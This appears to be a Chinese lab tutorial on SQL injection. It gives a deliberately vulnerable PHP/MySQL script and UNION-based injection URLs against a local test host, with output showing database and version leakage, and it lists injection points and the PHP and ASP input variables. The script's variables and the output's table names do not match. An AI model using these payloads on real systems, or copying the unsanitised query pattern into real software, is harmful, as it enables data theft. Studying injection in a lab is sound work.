当前位置:Gxlcms > 数据库问题 > 类型SQL注入实验 Part1

类型SQL注入实验 Part1

时间:2021-07-01 10:21:17 帮助过:29人阅读

准备为PHPstudy环境

<?php

$id = $_GET[‘t‘];
$conn = mysql_connect("127.0.0.1","root","root");
mysql_select_db("kimmy",$conn);
$sql="select * from admin where use=$title";

$result = mysql_query($sql);
while($row = mysql_fetch_array($result)){
echo "UserId".$row[‘id‘]."<br >";
echo "Title".$row[‘title‘]."<br >";
echo "TextContent".$row[‘text‘]."<br >";
}

mysql_close($conn);

echo "The SQL Sentence:".$sql;

?>

数字型

字符型:
PHP脚本

URL:
http://192.168.221.188/sqltest/index.php?t=admin‘ union select 1,2,3 and ‘1‘=‘1

输出:
UserId:1
Username:admin
Password:password
UserId:1
Username:2
Password:1
The SQL Sentence:select * from info where username=‘admin‘ union select 1,2,3 and ‘1‘=‘1‘

URL:
http://192.168.221.188/sqltest/index.php?t=admin‘ union select database(),version(),3 and ‘1‘=‘1

输出:
UserId:1
Username:admin
Password:password
UserId:kimmy
Username:5.5.53
Password:1
The SQL Sentence:select * from info where username=‘admin‘ union select database(),version(),3 and ‘1‘=‘1‘

搜索型:
%通配符

 

提交注入

GET注入

Post注入

Cookie注入

http头注入

基础;http数据包

PHP:

$_GET 接受get传递

$_POST接受post传递

$_COOKIE接受cookie传递

$_REQUEST 全部接受

 

Asp:

Request.querystring  接受get

Request.form接受post

Request.cookie 接受cookie

Request 全部接受

类型SQL注入实验 Part1

标签:实验   通配符   ase   art   The   sqlt   where   字符型   sele   

人气教程排行